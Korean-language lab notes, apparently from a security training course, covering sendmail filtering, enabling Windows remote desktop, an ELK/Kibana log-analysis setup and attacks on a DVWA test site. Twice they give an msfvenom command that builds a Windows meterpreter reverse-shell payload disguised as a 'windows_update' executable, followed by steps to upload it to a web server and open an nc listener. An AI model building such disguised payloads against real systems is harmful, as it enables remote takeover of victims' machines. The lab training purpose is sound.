미션1
해커로 부터 오는 이메일 정상화 시키기
nano /etc/mail/access
makemap hash /etc/mail/access < /etc/mail/access
systemctl restart sendmail
칼리에서 공격root로
msfvenom --platform windows -p windows/meterpreter/reverse_tcp
LHOST=100.100.100.1
LPORT=4444
-b "Wx00"
-f exe
-o /home/kali/windows_update_20240114001.exe
미션2
윈도우 원격연결 활성화 시키기
제어판->시스템 및 보안->시스템->원격설정->
방화벽 NAT추가
미션3
lms.st.kr 이라는 사이트가 정상적으로 운영되도록 설정할것
editplus에
enctype없으면 업로드가 안됌
칼리에서 공격root로
msfvenom --platform windows -p windows/meterpreter/reverse_tcp
LHOST=100.100.100.1
LPORT=4444
-b "Wx00"
-f exe
-o /home/kali/windows_update_20250114001.exe
칼리에서 lms에 windows파일 업로드
포트여는법 nc -l -p 4444 ->확인 netstat -ant | grep 4444
[01-14selk버전 2204로]
nano /etc/elasticsearch/elasticsearch.yml
network 0.0.0.0 으로 허용
systemctl start elasticsearch 오류뜨면 nano /etc/다시들어가서 directory 주석제거
curl -X GET "localhost:9200"
systemctl enable elasticsearch
netstat -ant | grep 5601
nano /etc/nginx/sites-available/default
systemctl restart nginx
systemctl start kibana
systemctl enable kibana
reboot
dvwa.st.kr 공격하면
ping > hping3 > nikto > Brute Force
access.log
10.0.2.3 kibana 분석
cd /var/log/apache2->ls->cp access.log /backup->cd /backup->ls->\\10.0.2.15에 access.log 바탕화면에빼오고 www폴더안에넣기
->10.0.2.3웹사이트에 home에 upload a file에 들어가서 access.log 열고 import후
->www_access_log->import
로그보기
메인 서버에서 cd /home/dvwa/public_html/logs
[3대 서버 설치]
curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch |sudo gpg --dearmor -o /usr/share/keyrings/elastic.gpg
echo "deb [signed-by=/usr/share/keyrings/elastic.gpg] https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
sudo apt update
sudo apt -y install filebeat
sudo apt -y install packetbeat
systemctl start logstash
nano logdd
output
nano /etc/logstash/conf.d/elasticsearch-output.conf
output {
if [@metadata][pipeline] {
elasticsearch {
hosts => ["localhost:9200"]
manage_template => false
index => "%{[@metadata][beat]}-%{[@metadata]}-%[]"